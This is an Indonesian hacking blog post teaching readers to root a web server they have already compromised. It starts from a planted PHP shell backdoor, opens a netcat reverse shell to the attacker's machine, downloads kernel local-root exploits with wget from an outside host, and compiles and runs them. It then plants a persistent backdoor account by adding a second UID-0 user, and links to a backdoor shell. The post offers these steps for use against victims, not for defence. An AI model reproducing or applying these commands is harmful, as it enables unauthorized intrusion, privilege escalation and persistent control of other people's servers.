Selamat datang di Blog Arciko Cyber (Powered @ by.Poernama Sidik)

Root Server & Tambah User Root Baru

Dear BinusHacker Family,
Cara untuk ngeroot server & menambahkan user root baru, dikemudian hari bisa digunakan lebih jauh.
Hal yang dibutuhkan adalah
  • Komputer & Kopi
  • Situs target yang sudah di inject “shell backdoor”
  • Tool-tool Localroot Exploit
  • Netcat

1 – Cari Informasi Detail Server Target

Buka shell php di website yang sebelumnya telah ter-hack & terpasang backdoor “shell php
Contoh: http://www.situstargetyangtelahdihack.com/path/dir/shell.php
Tampilannya akan seperti dibawah:

Langkah selanjutnya adalah pastikan anda mengetahui kernel server yang dipakai, biasanya sudah ada informasinya di “shell backdoor” seperti contoh di atas yaitu:
Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686
Atau anda juga bisa menggunakan dan menjalankan perintah: uname -a
Dari informasi diatas kita ketahui bahwa kernelnya adalah:  2.6.18-8 i686
Nah, setelah mengetahui informasi kernel, maka langkah yang harus dilakukan adalah cari dan temukan “LocalRoot Exploit” tool yang cocok untuk kernel diatas. Sediakan localroot untuk kernel ini: 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.
Kita cari disini saja localroot exploitnya, kebetulan banyak listnya: localroot.th3-0utl4ws
download local root

2 – BackConnecting Dari Server Ke Komputer Attacker

Seperti yang disampaikan sebelumnya, yang dibutuhkan dalam hal ini adalah:

  1. Netcat Tools (Harus sudah terinstall di komputer)
  2. Open port (Port-port yang secara otomatis terbuka)
Buka netcat dan jalankan perintah berikut, misal port yang akan digunakan adalah 443:
C:\WINDOWS\system32\cmd.exe – nc -l -n -v -p 443
Kemudian tekan “Enter
Nanti akan muncul pesan “Listening on [any] 443 …
Setelah itu, kita kembali ke “shell backkdor” yang sudah kita tanamkan.
Cari fungsi “Back Connect“, kemudian isikan IP yang kita miliki & port.
Misal: IP Kita: 10.10.10.10 dan port: 443, seperti gambar dibawah:


Kita jalankan perintah “Connect
Klo berhasil akan muncul seperti ini di layar command line kita, itu artinya back connect berhasil dengan sukses.


3 – Download Exploit & Eksekusi Exploit

Kita akan membutuhkan localroot exploit, bisa di download dari link yang sudah disebutkan diatas, adapun beberapa cara yang bisa dilakukan yaitu
1) Menggunakan fungsi “WGET / CURL
2) Bisa menggunakan cara upload manual dari shell
Berhubung di server ini “WGET” bisa dilakukan, maka download localroot exploit memakai fungsi “WGET”.
Oke, copy saja download link “localroot exploit yang tepat:
Download Kumpulan Tools Localroot Dari Th3-0utl4ws
download local root
Untuk mendownload tools diatas ketikkan saja perintah: wget http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip
Apabila sudah terdownload maka extract “local root tools” tersebut, bisa dengan menggunakan perintah “unzip” atau “untar” atau “tar

Seperti contoh diatas, “localroot exploit sudah terdownload” dan ter-extract:
unzip prct1.c.zip
Langkah selanjutnya adalah mengcompile localroot exploit tersebut, karena menggunakan bahasa “C”, maka yang digunakan adalah perintah GCC:
gcc prct1.c -o prc
Kemudian jalankan:
./prc
Catatan: Jika gagal dan muncul error, sebaiknya menggunakan tools “local root” exploit yang lainnya. (JANGAN MENYERAH!)
Yang di atas masih gagal, lakukan lagi & cari exploit lainnya!
Unzip lagi file localroot exploit yang lainnya: unzip 2.6.18-164.zip


Nah, localroot exploit diatas sangat cocok untuk kernel ini: (“2.6.18-164“)
Karena sudah berbentuk file yang sudah dicompile dan sudah bisa di eksekusi, langsung saja dieksekusi & jangan lupa change permissionnya jadi “777″, seperti contoh berikut:
chmod 777 2.6.18-164
Kemudian jalankan exploit:
./2.6.18-164
Untuk mengecek apakah kita sudah berhasil mendapatkan akses root, check dengan perintah berikut:
id
or
whoami


Jreng.. Jreng.. Jreng.. Anda sudah mendapatkan akses root, congrat!

4 – Menambahkan User Root Baru

Menambahkan user akses selevel dengan root sangatlah mudah, gunakan saja perintah berikut, sebagai contoh kita akan menambahkan akses root dengan user “Haxorfortutorial“:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Haxorfortutorial
Penjelasan perintah:
Quote:
adduser – Perintah dasar linux untuk menambahkan user
-u 0 -o – set user menjadi dengan ID nol (0) root.
-g 0 – Set initial group dengan ID nol (0) root.
-G 0,1,2,3,4,6,10 – Set additional group ke:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel
-M – ‘home directory’ tidak di create ke user.
Haxorfortutorial - User name of the new user account.
Catatan: Rubah user Haxorfortutorial sesuai dengan username yang kalian inginkan, ini hanya contoh saja :)
Selanjutnya, lakukan set password untuk user yang telah kita buat.
Perintahnya:
passwd Haxorfortutorial
Contoh implementasi:
[root@fedora ~]# passwd Haxorfortutorial
Changing password for user Haxorfortutorial.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
id Haxorfortutorial

Backdoor GNY shell – http://privatepaste.com/1321f97984
Tools NetCat – http://downloadnetcat.com/nc11nt.zip
Demikian tutorial singkat cara ngeroot server dengan mudah, semoga selalu berhasil ngeroot! Selesai :)

Tidak ada komentar :

Posting Komentar

Silahkan masukan komentar anda...

Semoga Artikel Artikel Arciko Cyber menjadi bermanfaat buat anda dan jangan terlalu cepat, budayakanlah membaca....